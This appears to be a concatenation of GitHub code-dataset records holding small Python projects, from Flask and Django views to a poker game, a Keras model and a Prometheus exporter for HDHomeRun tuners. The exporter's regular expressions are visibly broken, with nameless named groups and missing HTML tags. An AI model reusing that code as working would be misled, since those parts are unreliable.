A\nprint('Enter the values for matrix A')\nfor i in range(LINHAS):\n\ta.append(int(input('Enter a number: ')))\n\n# matrix B\nprint('Enter the values for matrix B')\nfor i in range(LINHAS):\n\tb.append(int(input('Enter a number: ')))\n\n# matrix C\nfor i in range(0,LINHAS):\n    linha = []\n    linha.append(a[i] * 2)\n    linha.append(b[i] - 5)\n    c.append(linha)\n\nfor i in c:\n    print(i)","repo_name":"carlosfabioa/TDS_exercicios_logica_programacao","sub_path":"6- Matriz com duas dimensoes/05exercicio.py","file_name":"05exercicio.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"3264138345","text":"from flask import Blueprint, render_template, redirect, url_for\n# db import\nfrom apps.app import db\n# User Class import\nfrom apps.crud.models import User\nfrom apps.crud.forms import UserForm\n\n\n#bp = Blueprint('main', __name__, url_prefix='/')\n\n# create the crud app as a Blueprint\ncrud = Blueprint(\n    \"crud\",\n    __name__,\n    template_folder=\"templates\",\n    static_folder=\"static\",\n)\n\n# define the index endpoint and return index.html\n@crud.route(\"/\")\ndef index():\n    return render_template(\"crud/index.html\")\n\n\n@crud.route(\"/sql\")\ndef sql():\n    db.session.query(User).get(1)\n    return \"Please check the console log\"\n\n@crud.route(\"/users/new\", methods=[\"GET\", \"POST\"])\ndef create_user():\n    # Instantiate UserForm.\n    form = UserForm()\n    # Validate the form values.\n    if form.validate_on_submit():\n        # Create the user.\n        user = User(\n            username=form.username.data,\n            email=form.email.data,\n            password=form.password.data,\n        )\n        \n        # Add the user and commit.\n        db.session.add(user)\n        db.session.commit()\n\n        # Redirect to the user list page.\n        return redirect(url_for(\"crud.users\"))\n    return render_template(\"crud/create.html\", form=form)\n\n'''\n@bp.route('/hello')\ndef hello_world():\n    return 'hello, world!'\n\n@bp.route('/')\ndef index():\n    return 'This is index'\n '''","repo_name":"wooseong-dev/web_flask_shop_Project","sub_path":"apps/crud/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18273353741","text":"# *******************\n# By: Timothy Metzger\n# *******************\n\nimport os\n\n\ndef main():\n    \"\"\"Asks the user for a base folder name and the number of folders they\n    wish to create in a user-specified directory,\n    i.e. Base Folder Name: Homework, Number of Folders: 10 --> Homework 1, Homework 2,..., Homework n \"\"\"\n\n    base_name = input(\"Base folder name: \")\n    number_folders = int(input(\"Number of folders you wish to create: \"))\n    directory = input(\"Directory: \")\n\n    directory = directory.replace(\"\\\\\", \"/\")\n    print(directory)\n\n    if not os.path.exists(directory + \"/\" + base_name + \"s\"):\n        os.mkdir(directory + \"/\" + base_name + \"s\")\n\n    for i in range(1, number_folders + 1):\n        try:\n            os.mkdir(directory + \"/\" + base_name + \"s/\" + f'{base_name} {i}')\n        except Exception as e:\n            print(e)\n\n\nif __name__ == '__main__':\n    
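# run the interactive folder-creation prompts when executed as a script\n    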
main()\n","repo_name":"timMetzger/pythonScripts","sub_path":"folderCreator.py","file_name":"folderCreator.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"471778399","text":"#!/usr/bin/env python3\n\n\ndef find_reoccurring_character(s):\n track = []\n result = 'No reoccurring characters found'\n\n if not isinstance(s, str):\n return result\n\n for character in s:\n if character in track:\n result = character\n break\n\n track.append(character)\n\n return result\n","repo_name":"ericwegscheid/code-exercises","sub_path":"python/find-first-reoccurring-character/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3692308338","text":"from translator import Translator\nfrom pynput.keyboard import Key, KeyCode, Listener\nimport pyperclip\n\ndef changeLayout():\n\n cb = pyperclip.paste()\n output = Translator().translate(cb)\n pyperclip.copy(output)\n\n\ndef changeCapitalise():\n\n cb = pyperclip.paste()\n output = Translator().change_cap(cb)\n pyperclip.copy(output)\n\n\ncombination_to_function = {\n frozenset([Key.ctrl_l, Key.space]): changeLayout,\n frozenset([Key.ctrl_l, Key.alt_l, Key.space]): changeCapitalise,\n}\n\ncurrent_keys = set()\n\ndef on_press(key):\n current_keys.add(key)\n if frozenset(current_keys) in combination_to_function:\n combination_to_function[frozenset(current_keys)]()\n\ndef on_release(key):\n current_keys.clear()\n\nwith Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()","repo_name":"StormInside/Fast-layout-translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28888120797","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom profiles.models import Profile\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n@login_required\ndef get_user_profile(request, username):\n if request.method == 'GET':\n profile = get_object_or_404(Profile, user__username=username)\n # profile = Profile.objects.get(user__username=username)\n context = {\n 'profile': profile,\n }\n return render(request, 'profiles/profile.html', context=context)\n \n@login_required\ndef edit_user_profile(request, username):\n profile = get_object_or_404(Profile, user__username=username)\n context = {\n 'profile': profile,\n }\n if request.method == 'GET':\n if request.user.id == profile.user.id:\n return render(request, 'profiles/edit_profile.html', context=context)\n else:\n return render(request, 'profiles/profile.html', context=context)","repo_name":"SemenchukOleg/git_gr8","sub_path":"MODULE_3/LESSON_02/blogit-project/blogitproject/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10248752867","text":"import random\n\n\nclass Card(object):\n\n def __init__(self, value, suit):\n self.value = value\n self.suit = suit\n\n def show(self):\n print(\"{}{}\".format(self.value, self.suit))\n\n\nclass Deck(object):\n\n def __init__(self):\n self.deck = []\n self.build()\n\n def build(self):\n for s in ['d', 'c', 'h', 's']:\n for v in ['A', 2, 3, 4, 5, 6, 7, 8, 9, 'T', 'J', 'Q', 'K']:\n 
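# one Card per (value, suit) pair, 52 in total\n                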
self.deck.append(Card(v, s))\n\n def shuffle(self):\n for i in range(len(self.deck)-1, 0, -1):\n r = random.randint(0, i)\n self.deck[r], self.deck[i] = self.deck[i], self.deck[r]\n\n def draw(self, number_of_cards):\n self.drawn_cards = []\n for n in range(0, number_of_cards):\n self.drawn_cards.append(self.deck.pop())\n return self.drawn_cards\n\n\nclass Player(object):\n\n def __init__(self, name, hand, stack):\n self.name = name\n self.hand = hand\n self.stack = stack\n self.status = \"in\"\n self.player_bet = 0.0\n\n def show_hand(self):\n print(\"{} has hand:\".format(self.name))\n for c in self.hand:\n c.show()\n\n def show_stack(self):\n print(\"{} has stack: {}bb\".format(self.name, self.stack))\n\n def bet(self):\n\n while not 1 <= self.player_bet <= self.stack:\n try:\n self.player_bet = float(input(\"Enter betsize:\"))\n except ValueError:\n print(\"Enter an integer\")\n\n self.stack = self.stack - self.player_bet\n\n return self.player_bet\n\n def call_bet(self, current_bet):\n\n to_call = current_bet - self.player_bet\n # print(\">>>>> to call =\", to_call)\n\n if self.stack < to_call:\n self.player_bet = self.player_bet + self.stack\n called_amount = self.stack\n self.stack = 0.0\n self.status = 'all in'\n else:\n self.player_bet = current_bet\n self.stack = self.stack - to_call\n called_amount = to_call\n\n return called_amount\n\n def raise_bet(self, current_bet):\n\n if self.stack >= 2*current_bet:\n raise_size = 0\n while not current_bet <= raise_size <= self.stack:\n try:\n betsize = float(input(\"Enter betsize:\"))\n raise_size = betsize - current_bet\n except ValueError:\n print(\"Enter an integer\")\n\n additional_bet = betsize - self.player_bet\n self.stack = self.stack - additional_bet\n self.player_bet = betsize\n\n else:\n additional_bet = self.stack\n self.player_bet = self.player_bet + additional_bet\n self.stack = 0.0\n\n return additional_bet\n\n # def raise_all_in(self, current_bet):\n # self.player_bet = self.stack\n # self.stack = 0\n\n def option_agg(self):\n choice = None\n while choice not in ('c', 'b'):\n print('c to check, b to bet:')\n choice = input()\n if choice == 'c':\n return 0.0\n if choice == 'b':\n return self.bet()\n\n def option_def(self, current_bet):\n choice = None\n while choice not in ('f', 'c', 'r'):\n print('f to fold, c to call, r to raise:')\n choice = input()\n if choice == 'f':\n self.status = 'out'\n return 0.0\n elif choice == 'c':\n return self.call_bet(current_bet)\n elif choice =='r':\n return self.raise_bet(current_bet)\n\n\n\nclass Dealer(object):\n\n def deal(self, num_players):\n\n deck = Deck()\n deck.shuffle()\n\n preflop_all_cards = deck.draw(2 * num_players)\n self.hands = [preflop_all_cards[i:i + 2] for i in range(0, len(preflop_all_cards), 2)]\n\n preflop = {'name': 'Preflop', 'cards': self.hands}\n flop = {'name': 'Flop', 'cards': deck.draw(3)}\n turn = {'name': 'Turn', 'cards': deck.draw(1)}\n river = {'name': 'River', 'cards': deck.draw(1)}\n showdown = {'name': 'Showdown', 'cards': (flop['cards'] + turn['cards'] + river['cards'])}\n\n self.streets = [preflop, flop, turn, river, showdown]\n\n def show_cards(self, street):\n print(\"{}:\".format(street['name']))\n\n for card in street['cards']:\n card.show()\n\n def receive_bet(self, player, round):\n if round.max_bet == 0:\n bet_received = player.option_agg()\n else:\n bet_received = player.option_def(round.max_bet)\n\n if player.stack == 0:\n player.status = 'all in'\n\n return bet_received\n\n def distribute_pot(self, winner):\n winner.stack = winner.stack + 
potsize\n\n\n\nclass Round(object):\n\n def __init__(self, player_info):\n self.num_active_players = len(player_info)\n self.active_players = []\n self.inactive_players = []\n self.pot = 0\n self.max_bet = 0\n\n def show_stacks(self, active_players):\n for player in active_players:\n print(\"{} has stack {}bb\".format(player.name, player.stack))\n\n def player_action(self, dealer):\n\n for player in self.active_players:\n\n if player.status == 'in' and (player.player_bet == 0 or player.player_bet < self.max_bet):\n\n print(\"Pot is {}bb\".format(self.pot))\n print(\"{}, your option, you have {}bb:\".format(player.name, player.stack))\n\n bet_added_to_pot = dealer.receive_bet(player, round)\n self.pot = self.pot + bet_added_to_pot\n if player.player_bet >= self.max_bet:\n self.max_bet = player.player_bet\n\n print(\"{} bet {}bb\".format(player.name, bet_added_to_pot))\n print(\"{} now has stack {}bb\".format(player.name, player.stack))\n\n for p in range(len(self.active_players) - 1, -1, -1):\n if self.active_players[p].status == 'out':\n self.inactive_players.append(self.active_players.pop(p))\n self.num_active_players -= 1\n elif self.active_players[p].status == 'all in':\n self.num_active_players -= 1\n\n def play_street(self, dealer, street):\n\n self.max_bet = 0\n\n for player in self.active_players:\n player.player_bet = 0\n\n if street['name'] == 'Preflop':\n for player in self.active_players:\n player.show_hand()\n else:\n dealer.show_cards(street)\n\n if street['name'] != 'Showdown':\n self.show_stacks(self.active_players)\n self.player_action(dealer)\n\n# need to allow another loop if there is one player left not all in and has the option to call\n\n while ((not all(player.player_bet == self.active_players[0].player_bet for player in self.active_players))\n and self.num_active_players > 1):\n print(\"looping\")\n self.player_action(dealer)\n\n\n def play(self):\n\n dealer = Dealer()\n dealer.deal(self.num_active_players)\n\n i = 0\n for player in player_info:\n player = Player(player['name'], dealer.hands[i], player['stack'])\n self.active_players.append(player)\n i += 1\n\n for street in dealer.streets:\n\n if self.num_active_players > 1:\n self.play_street(dealer, street)\n\n print(\"Stacks at end of round:\")\n self.show_stacks(self.active_players)\n self.show_stacks(self.inactive_players)\n print(\"Pot size: {}\".format(self.pot))\n\n\n\nplayer1 = {'name': 'Player 1', 'stack': 100}\nplayer2 = {'name': 'Player 2', 'stack': 100}\nplayer3 = {'name': 'Player 3', 'stack': 100}\n\nplayer_info = [player1, player2]\n\nround = Round(player_info)\nround.play()\n","repo_name":"jlambton/pokerbot","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30180447817","text":"from numpy.core.fromnumeric import transpose\nfrom numpy.lib import utils\nfrom numpy.lib.financial import ipmt\nfrom sklearn import model_selection\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Input\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.autograph.utils.ag_logging import _output_to_stdout\nfrom tensorflow.python.keras.engine.input_layer import InputLayer\n\nfrom utills import format_output, norm, plot_diff\n\n\n# prepare data\n\n# Specify data URI\nURI = './data/ENB2012_data.xlsx'\n\n# Use pandas excel 
reader\ndf = pd.read_excel(URI)\ndf = df.sample(frac=1).reset_index(drop=True)\n\n# split the data into train and test with 80/20 split\ntrain, test = train_test_split(df, test_size=0.2)\ntrain_stats = train.describe()\n\n\ntrain_stats.pop('Y1')\ntrain_stats.pop('Y2')\ntrain_stats = train_stats.transpose()\n\ntrain_Y = format_output(train)\ntest_Y = format_output(test)\n\n# Normalise the training and test data\nnorm_train_X = norm(train_stats, train)\nnorm_test_X = norm(train_stats, test)\n\n\n# def building_model():\n\n# Define layers\ninput_layer = Input(shape=(len(train.columns),))\nfirst_dense = Dense(units='128', activation='relu')(input_layer)\nsecond_dense = Dense(units='128', activation='relu')(first_dense)\n\n\n# Y1 output will be fed directly from the second layer\ny1_output = Dense(units='1', name='y1_output')(second_dense)\nthird_layer = Dense(units='64', activation='relu')(second_dense)\n\n# Y2 output will be fed from the third layer\ny2_output = Dense(units='1', name='y2_output')(third_layer)\n\n# defining model\n\nmodel = Model(inputs=input_layer, outputs=[y1_output, y2_output])\n\n\nprint(model.summary())\n\n\n# Configure parameters\n# Specify the optimizer, and compile the model with loss functions for both outputs\noptimizer = tf.keras.optimizers.SGD(lr=0.001)\nmodel.compile(optimizer=optimizer,\n              loss={'y1_output': 'mse', 'y2_output': 'mse'},\n              metrics={'y1_output': tf.keras.metrics.RootMeanSquaredError(),\n                       'y2_output': tf.keras.metrics.RootMeanSquaredError()})\n\n\n# Training the model\nhistory = model.fit(norm_train_X, train_Y, epochs=500,\n                    batch_size=10, validation_data=(norm_test_X, test_Y))\n\n# evaluate model and plot metrics\n\nloss, Y1_loss, Y2_loss, Y1_rmse, Y2_rmse = model.evaluate(\n    x=norm_test_X, y=test_Y)\nprint(\"Loss = {}, Y1_loss = {}, Y1_mse = {}, Y2_loss = {}, Y2_mse = {}\".format(\n    loss, Y1_loss, Y1_rmse, Y2_loss, Y2_rmse))\n\n# Plot the loss and mse\nfrom utills import plot_metrics  # assumed to live in utills alongside plot_diff\nY_pred = model.predict(norm_test_X)\nplot_diff(test_Y[0], Y_pred[0], title='Y1')\nplot_diff(test_Y[1], Y_pred[1], title='Y2')\nplot_metrics(metric_name='y1_output_root_mean_squared_error',\n             title='Y1 RMSE', ylim=6)\nplot_metrics(metric_name='y2_output_root_mean_squared_error',\n             title='Y2 RMSE', ylim=7)\n","repo_name":"matrxrapture/advanced_tf","sub_path":"multi-output-model.py","file_name":"multi-output-model.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8649079875","text":"\"\"\"Application exporter\"\"\"\n\nimport os\nimport time\nfrom prometheus_client import start_http_server, Gauge, Enum\nimport requests\nimport yaml\nimport codecs\nimport re\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\nclass AppConfig:\n\tdef __init__(self, file):\n\t\ttry:\n\t\t\twith codecs.open(file, encoding=\"utf-8-sig\", mode=\"r\") as f:\n\t\t\t\tsettings = yaml.safe_load(f)\n\t\t\t\tself.__dict__.update(settings)\n\t\texcept yaml.YAMLError as exc:\n\t\t\tprint(exc)\n\t\t# self.metrics = MetricsConfig()\n\nclass TunerConfig:\n\tdef __init__(self, hostname: str, useTls: bool, validateTls: bool):\n\t\tself.hostname = hostname\n\t\tself.useTls = useTls\n\t\tself.validateTls = validateTls\n\nclass MetricsConfig:\n\tdef __init__(self, port: int, pollingInterval: int):\n\t\tself.port = port\n\t\tself.pollingInterval = pollingInterval\n\nclass DeviceSystemInfo:\n\tdef __init__(self, model: str, firmware: str, device_id: str, mac_address: str, ip_address: str, subnet_mask: 
str):\n\t\tself.model = model\n\t\tself.firmware = firmware\n\t\tself.device_id = device_id\n\t\tself.mac_address = mac_address\n\t\tself.ip_address = ip_address\n\t\tself.subnet_mask = subnet_mask\n\n\nclass HDHomeRunMetrics:\n\t\"\"\"\n\tRepresentation of Prometheus metrics and loop to fetch and transform\n\tapplication metrics into Prometheus metrics.\n\t\"\"\"\n\n\tdef __init__(self, config):\n\t\t\tself.namespace = \"hdhomerun\"\n\t\t\tself.polling_interval_seconds = config.metrics['pollingInterval']\n\t\t\tself.config = config\n\t\t\tself.tuners_available_total = Gauge(namespace=self.namespace, name=f\"tuners_available_total\", documentation=\"Total available tuners\", labelnames=[\"host\"])\n\t\t\tself.channels_available_total = Gauge(namespace=self.namespace, name=f\"channels_available_total\", documentation=\"Total number of channels\", labelnames=[\"host\"])\n\t\t\tself.tuners_in_use = Gauge(namespace=self.namespace, name=f\"tuners_in_use\", documentation=\"Number of tuners currently in use\", labelnames=[\"host\"])\n\t\t\tself.tuners_available = Gauge(namespace=self.namespace, name=f\"tuners_available\", documentation=\"Number of available tuners\", labelnames=[\"host\"])\n\t\t\tself.update_available = Gauge(namespace=self.namespace, name=f\"update_available\", documentation=\"Indicates if there is a system update\", labelnames=[\"host\"])\n\t\t\tself.up = Gauge(namespace=self.namespace, name=\"up\", documentation=\"Indicates if the service is able to be polled\", labelnames=[\"host\", \"service\"])\n\tdef run_metrics_loop(self):\n\t\t\"\"\"Metrics fetching loop\"\"\"\n\n\t\twhile True:\n\t\t\tprint(f\"begin metrics fetch\")\n\t\t\tself.fetch()\n\t\t\ttime.sleep(self.polling_interval_seconds)\n\n\tdef fetch_tuners(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"tuners.html\"), timeout=5)\n\t\t\t\tdata = resp.text\n\t\t\t\tregex = r\"\\s*(?P[^<]+)\\s*(?P[^<]+)\"\n\t\t\t\tinUse = 0\n\t\t\t\ttotalTuners = 0\n\n\t\t\t\tmatches = re.finditer(regex, data, re.MULTILINE)\n\t\t\t\tfor matchNum, match in enumerate(matches, start=1):\n\t\t\t\t\ttotalTuners += 1\n\t\t\t\t\tif match.group(2) != \"not in use\" and match.group(2) != \"none\":\n\t\t\t\t\t\t\tinUse += 1\n\t\t\t\tself.tuners_available_total.labels(host=tuner.hostname).set(totalTuners)\n\t\t\t\tself.tuners_in_use.labels(host=tuner.hostname).set(inUse)\n\t\t\t\tself.tuners_available.labels(host=tuner.hostname).set(totalTuners - inUse)\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_tuners\").set(1)\n\t\t\texcept Exception as e:\n\t\t\t\tself.tuners_available_total.labels(host=tuner.hostname).set(0)\n\t\t\t\tself.tuners_in_use.labels(host=tuner.hostname).set(0)\n\t\t\t\tself.tuners_available.labels(host=tuner.hostname).set(0)\n\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_tuners\").set(0)\n\t\t\t\tprint(e)\n\tdef fetch_update_status(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"upgrade_status.json\"), timeout=5)\n\t\t\t\tdata = resp.json()\n\t\t\t\tif \"UpgradeAvailable\" in data:\n\t\t\t\t\tself.update_available.labels(tuner.hostname).set(data[\"UpgradeAvailable\"])\n\t\t\t\telse:\n\t\t\t\t\tself.update_available.labels(tuner.hostname).set(0)\n\t\t\t\tself.up.labels(host=tuner.hostname, 
service=\"fetch_update_status\").set(1)\n\t\t\texcept Exception as e:\n\t\t\t\tself.update_available.labels(tuner.hostname).set(0)\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_update_status\").set(0)\n\t\t\t\tprint(e)\n\tdef fetch_available_channels(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"lineup.json?show=found\"), timeout=5)\n\t\t\t\tdata = resp.json()\n\t\t\t\tself.channels_available_total.labels(tuner.hostname).set(len(data))\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_available_channels\").set(1)\n\t\t\texcept Exception as e:\n\t\t\t\tself.channels_available_total.labels(tuner.hostname).set(0)\n\t\t\t\tself.up.labels(host=tuner.hostname, service=\"fetch_available_channels\").set(0)\n\t\t\t\tprint(e)\n\n\tdef fetch_system_info(self):\n\t\tfor t in self.config.tuners:\n\t\t\ttuner = TunerConfig(t['hostname'], t['useTLS'], t['validateTLS'])\n\t\t\ttry:\n\t\t\t\tresp = requests.get(url=self.build_url(tuner, \"tuners.html\"), timeout=5)\n\t\t\t\tdata = resp.text\n\t\t\t\tregex = r\"\\s*([^<]+)\\s*([^<]+)\"\n\n\t\t\t\tmatches = re.finditer(regex, data, re.MULTILINE)\n\t\t\t\tfor matchNum, match in enumerate(matches, start=1):\n\n\t\t\t\t\tattr:str = match.group(1)\n\t\t\t\t\tval:str = match.group(2)\n\t\t\t\t\tmodel:str = \"\"\n\t\t\t\t\tfirmware:str = \"\"\n\t\t\t\t\tdeviceId:str = \"\"\n\t\t\t\t\tmacAddr:str = \"\"\n\t\t\t\t\tipAddr:str = \"\"\n\t\t\t\t\tsubnetMask:str = \"\"\n\t\t\t\t\tif attr == \"Hardware Model\":\n\t\t\t\t\t\tmodel = val\n\t\t\t\t\telif attr == \"Firmware Version\":\n\t\t\t\t\t\tfirmware = val\n\t\t\t\t\telif attr == \"Device ID\":\n\t\t\t\t\t\tdeviceId = val\n\t\t\t\t\telif attr == \"MAC Address\":\n\t\t\t\t\t\tmacAddr = val\n\t\t\t\t\telif attr == \"IP Address\":\n\t\t\t\t\t\tipAddr = val\n\t\t\t\t\telif attr == \"Subnet Mask\":\n\t\t\t\t\t\tsubnetMask = val\n\n\t\t\t\t\tsysInfo = DeviceSystemInfo(model=model, firmware=firmware, device_id=deviceId, mac_address=macAddr, ip_address=ipAddr, subnet_mask=subnetMask)\n\t\t\t\t\t\n\t\t\texcept Exception as e:\n\n\t\t\t\tprint(e)\n\n\tdef fetch(self):\n\t\t\"\"\"\n\t\tGet metrics from application and refresh Prometheus metrics with\n\t\tnew values.\n\t\t\"\"\"\n\t\tself.fetch_update_status()\n\t\tself.fetch_available_channels()\n\t\tself.fetch_tuners()\n\n\tdef build_url(self, tuner: TunerConfig, path: str):\n\t\tscheme = \"http\"\n\t\tif tuner.useTls:\n\t\t\tscheme = \"https\"\n\t\treturn f\"{scheme}://{tuner.hostname}/{path}\"\n\ndef dict_get(dictionary, key, default_value = None):\n if key in dictionary.keys():\n return dictionary[key] or default_value\n else:\n return default_value\n\ndef main():\n\t\"\"\"Main entry point\"\"\"\n\tconfig_file = dict_get(os.environ, \"HDHR_CONFIG_FILE\", default_value=\"./config/.hdhomerun.yml\")\n\tprint(f\"Using config file {config_file}\")\n\tsettings = AppConfig(config_file)\n\n\tprint(f\"start listening on :{settings.metrics['port']}\")\n\tapp_metrics = HDHomeRunMetrics(settings)\n\tstart_http_server(settings.metrics['port'])\n\tapp_metrics.run_metrics_loop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"camalot/hdhomerun-exporter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36402229450","text":"from typing import Any, Dict, Literal, 
Optional\n\n\nclass ImageObject:\n    def __init__(\n        self,\n        url: str,\n        size: Literal['X_SMALL', 'SMALL', 'MEDIUM', 'LARGE', 'X_LARGE'] = None,\n        description: str = None,\n        width=None,\n        height=None\n    ):\n        self.description = description\n        self._source = []\n\n        base_source = {\n            \"url\": url\n        }\n        if size is not None:\n            base_source['size'] = size\n        if width is not None:\n            base_source['width'] = width\n        if height is not None:\n            base_source['height'] = height\n        self._source.append(base_source)\n\n    def to_dict(self):\n        response = {\n            \"sources\": self._source\n        }\n        if self.description is not None:\n            response['contentDescription'] = self.description\n        return response\n\n    def add_resource(\n        self,\n        url: str,\n        size: Literal['X_SMALL', 'SMALL', 'MEDIUM', 'LARGE', 'X_LARGE'] = None,\n        width=None,\n        height=None\n    ):\n        source = {\n            \"url\": url\n        }\n        if size is not None:\n            source['size'] = size\n        if width is not None:\n            source['width'] = width\n        if height is not None:\n            source['height'] = height\n        self._source.append(source)\n\n    def get_resource(\n        self, position: int\n    ):\n        return self._source[position]['url']\n\n    def remove_resource(\n        self, position: int\n    ):\n        self._source.pop(position)\n\n\nclass TextObject:\n    def __init__(\n        self,\n        text: str,\n        color: str = None,\n        display: Literal['none', 'block', 'inline'] = None,\n        opacity: float = None,\n        align: Literal['left', 'center', 'right'] = None,\n        margin: int = None,\n    ):\n        self.text = text\n        self.color = color\n        self.style = {}\n        if display is not None:\n            self.style['display'] = display\n        if opacity is not None:\n            self.style['opacity'] = opacity\n        if align is not None:\n            self.style['align'] = align\n        if margin is not None:\n            self.style['margin'] = \"{0}px\".format(margin)\n\n    def to_dict(self) -> Dict[str, Any]:\n        response = {\n            \"text\": self.text\n        }\n        if self.color is not None:\n            response['color'] = self.color\n        if self.style:\n            response['style'] = self.style\n        return response\n\n    @property\n    def display(self) -> Optional[Literal['none', 'block', 'inline']]:\n        return self.style.get('display')\n\n    @property\n    def opacity(self) -> Optional[float]:\n        return self.style.get('opacity')\n\n    @property\n    def align(self) -> Optional[Literal['left', 'center', 'right']]:\n        return self.style.get('align')\n\n    @property\n    def margin(self) -> Optional[str]:\n        return self.style.get('margin')\n\n\nclass ButtonObject:\n    def __init__(self, text: str, token: str):\n        self.text = text\n        self.token = token\n\n    def to_dict(self) -> Dict[str, str]:\n        return {\n            \"text\": self.text,\n            \"token\": self.token\n        }\n\n","repo_name":"gunyu1019/myschool","sub_path":"app/models/nugu/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"75086852266","text":"'''\nCreated on 2019-06-02\n\n@author: F-Monkey\n'''\nfrom scrapy.conf import settings\nimport redis\n\n\ndef save():\n    from spider.io.pojo import User\n    obj = User(url='1111', nickName='222', sex='F', head='222')\n    from spider.io.DB import session\n    from spider.io.DB import engine\n    from spider.io.DB import Base\n    Base.metadata.create_all(engine)\n    session.add(obj)  # @UndefinedVariable\n    session.commit()  # @UndefinedVariable\n\n\nr = redis.Redis(host=settings['REDIS_HOST'], port=settings['REDIS_PORT'])\ndef redisTest():\n\n    r.lpush('tieba:user_urls','http://tieba.baidu.com/home/main?un=%E8%82%A5%E7%8C%B4%E4%B8%B6&fr=ibaidu&ie=utf-8')\n\ndef redisTest2():\n    list_ = 
r.lrange('tieba:user_urls',0,-1)\n print(list_)\n\ndef printFloat():\n f = 0.01\n print('%f' %f)\n\nif __name__ == '__main__':\n printFloat()","repo_name":"F-Monkey/scrapy_notes","sub_path":"spider/spider/io/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42585694791","text":"import matplotlib.pyplot as plt\nimport csv\nimport sys\nimport re\nfrom collections import OrderedDict\n\nchpl_perf = {}\npy_perf = {}\n\nwith open(sys.argv[1]) as csv_data:\n r = csv.reader(csv_data, delimiter=',')\n header = True\n for row in r:\n if header:\n header = False\n else:\n problem_size = int(re.search(r\"nx=([0-9]+)\", row[1]).group(1)) * int(re.search(r\"ny=([0-9]+)\", row[1]).group(1))\n if row[0] == 'chpl':\n chpl_perf[problem_size] = float(row[-1].strip())\n elif row[0] == 'py':\n py_perf[problem_size] = float(row[-1].strip())\n\nchpl_perf = OrderedDict(sorted(chpl_perf.items()))\npy_perf = OrderedDict(sorted(py_perf.items()))\n\nf1 = plt.figure(1)\nax1 = f1.add_subplot(1, 1, 1)\nax1.plot(chpl_perf.keys(), chpl_perf.values(), label='chpl')\nax1.plot(py_perf.keys(), py_perf.values(), label='py')\nax1.legend()\nax1.set_xlabel(\"Problem Size\")\nax1.set_ylabel(\"Walltime (sec)\")\nax1.set_title(\"Performance Comparison (Chapel vs. Python) - {deets}\".format(deets = sys.argv[2]))\nf1.savefig(\"perf_plots/\" + sys.argv[3] + \".png\")\nf1.show()\n\nf2 = plt.figure(2)\nax2 = f2.add_subplot(1, 1, 1)\nax2.semilogy(chpl_perf.keys(), chpl_perf.values(), label='chpl')\nax2.semilogy(py_perf.keys(), py_perf.values(), label='py')\nax2.legend()\nax2.set_xlabel(\"Problem Size\")\nax2.set_ylabel(\"Walltime (sec) - Log Scale\")\nax2.set_title(\"Performance Comparison (Chapel vs. 
